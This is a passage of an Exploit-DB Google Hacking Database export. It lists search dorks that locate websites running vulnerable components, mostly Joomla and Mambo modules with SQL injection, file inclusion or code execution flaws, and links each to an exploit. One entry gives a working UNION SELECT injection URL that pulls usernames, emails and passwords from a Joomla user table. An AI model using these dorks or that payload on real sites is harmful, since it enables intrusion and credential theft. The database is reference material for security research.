<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2665</id>
<link>https://www.exploit-db.com/ghdb/2665</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_huruhelpdesk&quot;</shortDescription>
<textualDescription>Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: https://www.exploit-db.com/exploits/14449</textualDescription>
<query>inurl:&quot;index.php?option=com_huruhelpdesk&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_huruhelpdesk%22</querystring>
<edb>https://www.exploit-db.com/exploits/14449</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2397</id>
<link>https://www.exploit-db.com/ghdb/2397</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_iproperty&quot;</shortDescription>
<textualDescription>Joomla Component (com_iproperty) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14450</textualDescription>
<query>inurl:&quot;index.php?option=com_iproperty&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_iproperty%22</querystring>
<edb>https://www.exploit-db.com/exploits/14450</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3617</id>
<link>https://www.exploit-db.com/ghdb/3617</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jeajaxeventcalendar&quot;</shortDescription>
<textualDescription>Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability Author: altbta
</textualDescription>
<query>inurl:&quot;index.php?option=com_jeajaxeventcalendar&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?option=com_jeajaxeventcalendar%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2191</id>
<link>https://www.exploit-db.com/ghdb/2191</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jequoteform&quot;</shortDescription>
<textualDescription>Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: https://www.exploit-db.com/exploits/12607</textualDescription>
<query>inurl:&quot;index.php?option=com_jequoteform&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22index.php%3Foption%3Dcom_jequoteform%22</querystring>
<edb>https://www.exploit-db.com/exploits/12607</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2679</id>
<link>https://www.exploit-db.com/ghdb/2679</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jobline&quot;</shortDescription>
<textualDescription>Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: https://www.exploit-db.com/exploits/9187</textualDescription>
<query>inurl:&quot;index.php?option=com_jobline&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_jobline%22</querystring>
<edb>https://www.exploit-db.com/exploits/9187</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2800</id>
<link>https://www.exploit-db.com/ghdb/2800</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jp_jobs&quot;</shortDescription>
<textualDescription>Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12037</textualDescription>
<query>inurl:&quot;index.php?option=com_jp_jobs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_jp_jobs%22</querystring>
<edb>https://www.exploit-db.com/exploits/12037</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5914</id>
<link>https://www.exploit-db.com/ghdb/5914</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jsjobs&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?option=com_jsjobs&quot;
# By using this dork, sites vulnerable to Joomla! component com_jsjobs -
'customfields.php' SQL Injection, can be found. This dork is linked to the
following existing exploit: https://www.exploit-db.com/exploits/47249
# Date: 17/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;index.php?option=com_jsjobs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_jsjobs&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6105</id>
<link>https://www.exploit-db.com/ghdb/6105</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_jssupportticket&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?option=com_jssupportticket&quot;
# Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5
- Arbitrary File Download. This dork is linked to the following existing
exploit: https://www.exploit-db.com/exploits/47216
# Date: 20/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;index.php?option=com_jssupportticket&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_jssupportticket&quot;</querystring>
<edb></edb>
<date>2020-05-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2223</id>
<link>https://www.exploit-db.com/ghdb/2223</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_oziogallery&quot;</shortDescription>
<textualDescription>Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: https://www.exploit-db.com/exploits/14462</textualDescription>
<query>inurl:&quot;index.php?option=com_oziogallery&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22index.php%3Foption%3Dcom_oziogallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/14462</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2815</id>
<link>https://www.exploit-db.com/ghdb/2815</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_ponygallery&quot;</shortDescription>
<textualDescription>Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: https://www.exploit-db.com/exploits/4201</textualDescription>
<query>inurl:&quot;index.php?option=com_ponygallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_ponygallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/4201</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2214</id>
<link>https://www.exploit-db.com/ghdb/2214</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_portfolio&quot;</shortDescription>
<textualDescription>Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5139</textualDescription>
<query>inurl:&quot;index.php?option=com_portfolio&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22index.php%3Foption%3Dcom_portfolio%22</querystring>
<edb>https://www.exploit-db.com/exploits/5139</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1562</id>
<link>https://www.exploit-db.com/ghdb/1562</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_prime&quot;</shortDescription>
<textualDescription>Joomla Component com_prime Directory Traversal: https://www.exploit-db.com/exploits/11177</textualDescription>
<query>inurl:&quot;index.php?option=com_prime&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_prime%22</querystring>
<edb>https://www.exploit-db.com/exploits/11177</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1711</id>
<link>https://www.exploit-db.com/ghdb/1711</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_simpleboard&quot;</shortDescription>
<textualDescription>Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: https://www.exploit-db.com/exploits/5195</textualDescription>
<query>inurl:&quot;index.php?option=com_simpleboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_simpleboard%22</querystring>
<edb>https://www.exploit-db.com/exploits/5195</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2673</id>
<link>https://www.exploit-db.com/ghdb/2673</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_simplefaq&quot;</shortDescription>
<textualDescription>Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: https://www.exploit-db.com/exploits/4296</textualDescription>
<query>inurl:&quot;index.php?option=com_simplefaq&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_simplefaq%22</querystring>
<edb>https://www.exploit-db.com/exploits/4296</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2602</id>
<link>https://www.exploit-db.com/ghdb/2602</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_spa&quot;</shortDescription>
<textualDescription>Joomla Component com_spa SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14423</textualDescription>
<query>inurl:&quot;index.php?option=com_spa&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_spa%22</querystring>
<edb>https://www.exploit-db.com/exploits/14423</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3621</id>
<link>https://www.exploit-db.com/ghdb/3621</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?option=com_storedirectory&quot;</shortDescription>
<textualDescription>SQL Injection Vulnerability: http://127.0.0.1/index.php?option=com_storedirectory&amp;task=view&amp;id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users
Author: Ashiyane Digital Security Team</textualDescription>
<query>inurl:&quot;index.php?option=com_storedirectory&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php?option=com_storedirectory%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>8029</id>
<link>https://www.exploit-db.com/ghdb/8029</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?page=news.php&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php?page=news.php&quot;
# Advisories and Vulnerabilities
# Date: 18/08/2022
# Author: Omar Shash
</textualDescription>
<query>inurl:&quot;index.php?page=news.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?page=news.php&quot;</querystring>
<edb></edb>
<date>2022-08-18</date>
<author>Omar Shash</author>
</entry>
<entry>
<id>1466</id>
<link>https://www.exploit-db.com/ghdb/1466</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?pageid=&quot; Property Listings</shortDescription>
<textualDescription>Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: https://www.exploit-db.com/exploits/4184</textualDescription>
<query>inurl:&quot;index.php?pageid=&quot; Property Listings</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fpageid%3D%22+Property+Listings</querystring>
<edb>https://www.exploit-db.com/exploits/4184</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2519</id>
<link>https://www.exploit-db.com/ghdb/2519</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index.php?serverid=&quot;</shortDescription>
<textualDescription>Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: https://www.exploit-db.com/exploits/7148</textualDescription>
<query>inurl:&quot;index.php?serverid=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index.php%3Fserverid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/7148</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1588</id>
<link>https://www.exploit-db.com/ghdb/1588</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;index2.php?option=rss&quot; OR &quot;powered By Limbo CMS&quot;</shortDescription>
<textualDescription>Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: https://www.exploit-db.com/exploits/1729</textualDescription>
<query>inurl:&quot;index2.php?option=rss&quot; OR &quot;powered By Limbo CMS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22index2.php%3Foption%3Drss%22+OR+%22powered+By+Limbo+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/1729</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2579</id>
<link>https://www.exploit-db.com/ghdb/2579</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;inurl:file.php?recordID=&quot;</shortDescription>
<textualDescription>FILE SHARE v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10497</textualDescription>
<query>inurl:&quot;inurl:file.php?recordID=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22inurl:file.php%3FrecordID%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10497</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1802</id>
<link>https://www.exploit-db.com/ghdb/1802</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;ir/addlink.php?id=&quot; OR inurl:&quot;addlink.php?id=&quot;</shortDescription>
<textualDescription>list Web (addlink.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10838</textualDescription>
<query>inurl:&quot;ir/addlink.php?id=&quot; OR inurl:&quot;addlink.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22ir/addlink.php%3Fid%3D%22+OR+inurl:%22addlink.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10838</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2179</id>
<link>https://www.exploit-db.com/ghdb/2179</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;izle.asp?oyun=&quot;</shortDescription>
<textualDescription>FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: https://www.exploit-db.com/exploits/6453</textualDescription>
<query>inurl:&quot;izle.asp?oyun=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22izle.asp%3Foyun%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6453</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3609</id>
<link>https://www.exploit-db.com/ghdb/3609</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot;</shortDescription>
<textualDescription>inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot;
or refined
inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot; &quot;index of&quot;
Various &quot;tinybrowser&quot; vulnerabilities:
https://www.exploit-db.com/exploits/9296/
DigiP
</textualDescription>
<query>inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/9296</edb>
<date>2010-11-18</date>
<author>DigiP</author>
</entry>
<entry>
<id>3667</id>
<link>https://www.exploit-db.com/ghdb/3667</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot; OR inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot; &quot;index of&quot;</shortDescription>
<textualDescription>Author: DigiP Multiple Vulnerabilities: https://www.exploit-db.com/exploits/9296/</textualDescription>
<query>inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot; OR inurl:&quot;jscripts/tiny_mce/plugins/tinybrowser/&quot; &quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22jscripts/tiny_mce/plugins/tinybrowser/%22+OR+inurl:%22jscripts/tiny_mce/plugins/tinybrowser/%22+%22index+of%22</querystring>
<edb>https://www.exploit-db.com/exploits/9296</edb>
<date>2011-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>2833</id>
<link>https://www.exploit-db.com/ghdb/2833</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;kgb19&quot;</shortDescription>
<textualDescription>KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: https://www.exploit-db.com/exploits/3134</textualDescription>
<query>inurl:&quot;kgb19&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22kgb19%22</querystring>
<edb>https://www.exploit-db.com/exploits/3134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2653</id>
<link>https://www.exploit-db.com/ghdb/2653</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;kroax.php?category&quot;</shortDescription>
<textualDescription>PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: https://www.exploit-db.com/exploits/5942</textualDescription>
<query>inurl:&quot;kroax.php?category&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22kroax.php%3Fcategory%22</querystring>
<edb>https://www.exploit-db.com/exploits/5942</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1858</id>
<link>https://www.exploit-db.com/ghdb/1858</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;links_showcat.php?&quot;</shortDescription>
<textualDescription>Dlili Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11318</textualDescription>
<query>inurl:&quot;links_showcat.php?&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22links_showcat.php%3F%22</querystring>
<edb>https://www.exploit-db.com/exploits/11318</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2351</id>
<link>https://www.exploit-db.com/ghdb/2351</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;list.php?c=&quot;</shortDescription>
<textualDescription>Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: https://www.exploit-db.com/exploits/5384</textualDescription>
<query>inurl:&quot;list.php?c=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22list.php%3Fc%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5384</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2313</id>
<link>https://www.exploit-db.com/ghdb/2313</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;list.php?lcat_id=&quot;</shortDescription>
<textualDescription>D-Tendencia Bt 2008 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10494</textualDescription>
<query>inurl:&quot;list.php?lcat_id=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22list.php%3Flcat_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10494</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2709</id>
<link>https://www.exploit-db.com/ghdb/2709</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;lista_articulos.php?id_categoria=&quot;</shortDescription>
<textualDescription>SitioOnline SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10453</textualDescription>
<query>inurl:&quot;lista_articulos.php?id_categoria=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22lista_articulos.php%3Fid_categoria%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10453</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3538</id>
<link>https://www.exploit-db.com/ghdb/3538</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;lists/?p=subscribe&quot; | inurl:&quot;lists/index.php?p=subscribe&quot;</shortDescription>
<textualDescription>PHPList 2.10.2 GLOBALS[] Remote Code Execution: https://www.exploit-db.com/exploits/1659</textualDescription>
<query>inurl:&quot;lists/?p=subscribe&quot; | inurl:&quot;lists/index.php?p=subscribe&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22lists/%3Fp%3Dsubscribe%22+|+inurl:%22lists/index.php%3Fp%3Dsubscribe%22</querystring>
<edb>https://www.exploit-db.com/exploits/1659</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2908</id>
<link>https://www.exploit-db.com/ghdb/2908</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;main_forum.php?cat=&quot;</shortDescription>
<textualDescription>GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: https://www.exploit-db.com/exploits/10299</textualDescription>
<query>inurl:&quot;main_forum.php?cat=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22main_forum.php%3Fcat%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10299</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2811</id>
<link>https://www.exploit-db.com/ghdb/2811</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;member.php?page=comments&quot;</shortDescription>
<textualDescription>6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: https://www.exploit-db.com/exploits/4104</textualDescription>
<query>inurl:&quot;member.php?page=comments&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22member.php%3Fpage%3Dcomments%22</querystring>
<edb>https://www.exploit-db.com/exploits/4104</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>564</id>
<link>https://www.exploit-db.com/ghdb/564</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;messageboard/Forum.asp?&quot;</shortDescription>
<textualDescription>Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361</textualDescription>
<query>inurl:&quot;messageboard/Forum.asp?&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22messageboard%2FForum.asp%3F%22</querystring>
<edb></edb>
<date>2004-10-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4643</id>
<link>https://www.exploit-db.com/ghdb/4643</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;mgl-instagram-gallery/single-gallery.php?media&quot;</shortDescription>
<textualDescription>This Dork, helps us find websites, which contain the mgl-instagram-gallery plugin of WordPress Vulnerable to XSS
inurl:&quot;mgl-instagram-gallery/single-gallery.php?media&quot;
Drok3r</textualDescription>
<query>inurl:&quot;mgl-instagram-gallery/single-gallery.php?media&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;mgl-instagram-gallery/single-gallery.php?media&quot;</querystring>
<edb></edb>
<date>2018-01-01</date>
<author>Drok3r</author>
</entry>
<entry>
<id>3773</id>
<link>https://www.exploit-db.com/ghdb/3773</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;mod.php?mod=blog&quot; intext:&quot;powered by DIY-CMS&quot;</shortDescription>
<textualDescription>DIY-CMS blog mod SQL Injection. Author: snup</textualDescription>
<query>inurl:&quot;mod.php?mod=blog&quot; intext:&quot;powered by DIY-CMS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;mod.php?mod=blog&quot; intext:&quot;powered by DIY-CMS&quot;</querystring>
<edb></edb>
<date>2011-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>2771</id>
<link>https://www.exploit-db.com/ghdb/2771</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;mod=notizie&quot;</shortDescription>
<textualDescription>XCMS 1.83 Remote Command Execution - CVE: 2007-6652: https://www.exploit-db.com/exploits/4813</textualDescription>
<query>inurl:&quot;mod=notizie&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22mod%3Dnotizie%22</querystring>
<edb>https://www.exploit-db.com/exploits/4813</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2234</id>
<link>https://www.exploit-db.com/ghdb/2234</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;module=helpcenter&quot;</shortDescription>
<textualDescription>Help Center Live 2.0.6(module=helpcenter&amp;file=) Local File Inclusion - CVE: 2010-1652: https://www.exploit-db.com/exploits/12421</textualDescription>
<query>inurl:&quot;module=helpcenter&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22module%3Dhelpcenter%22</querystring>
<edb>https://www.exploit-db.com/exploits/12421</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1848</id>
<link>https://www.exploit-db.com/ghdb/1848</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;modules.php?name=My_eGallery&quot;</shortDescription>
<textualDescription>PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: https://www.exploit-db.com/exploits/5203</textualDescription>
<query>inurl:&quot;modules.php?name=My_eGallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22modules.php%3Fname%3DMy_eGallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/5203</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3384</id>
<link>https://www.exploit-db.com/ghdb/3384</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;modules/articles/index.php?cat_id=&quot;</shortDescription>
<textualDescription>XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: https://www.exploit-db.com/exploits/3594</textualDescription>
<query>inurl:&quot;modules/articles/index.php?cat_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22modules/articles/index.php%3Fcat_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/3594</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2028</id>
<link>https://www.exploit-db.com/ghdb/2028</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;myLDlinker.php&quot;</shortDescription>
<textualDescription>WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: https://www.exploit-db.com/exploits/14441</textualDescription>
<query>inurl:&quot;myLDlinker.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22myLDlinker.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/14441</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1873</id>
<link>https://www.exploit-db.com/ghdb/1873</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;nabopoll/&quot;</shortDescription>
<textualDescription>nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: https://www.exploit-db.com/exploits/3315</textualDescription>
<query>inurl:&quot;nabopoll/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22nabopoll/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3315</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2105</id>
<link>https://www.exploit-db.com/ghdb/2105</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;nabopoll/&quot;</shortDescription>
<textualDescription>nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: https://www.exploit-db.com/exploits/3305</textualDescription>
<query>inurl:&quot;nabopoll/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22nabopoll/%22</querystring>
<edb>https://www.exploit-db.com/exploits/3305</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2664</id>
<link>https://www.exploit-db.com/ghdb/2664</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;noticias.php?notiId=&quot;</shortDescription>
<textualDescription>Ele Medios CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10418</textualDescription>
<query>inurl:&quot;noticias.php?notiId=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22noticias.php%3FnotiId%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10418</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1888</id>
<link>https://www.exploit-db.com/ghdb/1888</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;option=com_camelcitydb2&quot;</shortDescription>
<textualDescription>Joomla CamelcityDB 2.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14530</textualDescription>
<query>inurl:&quot;option=com_camelcitydb2&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22option%3Dcom_camelcitydb2%22</querystring>
<edb>https://www.exploit-db.com/exploits/14530</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3090</id>
<link>https://www.exploit-db.com/ghdb/3090</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;option=com_elite_experts&quot;</shortDescription>
<textualDescription>Joomla Component (com_elite_experts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15100</textualDescription>
<query>inurl:&quot;option=com_elite_experts&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22option%3Dcom_elite_experts%22</querystring>
<edb>https://www.exploit-db.com/exploits/15100</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1931</id>
<link>https://www.exploit-db.com/ghdb/1931</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;option=com_org&quot;</shortDescription>
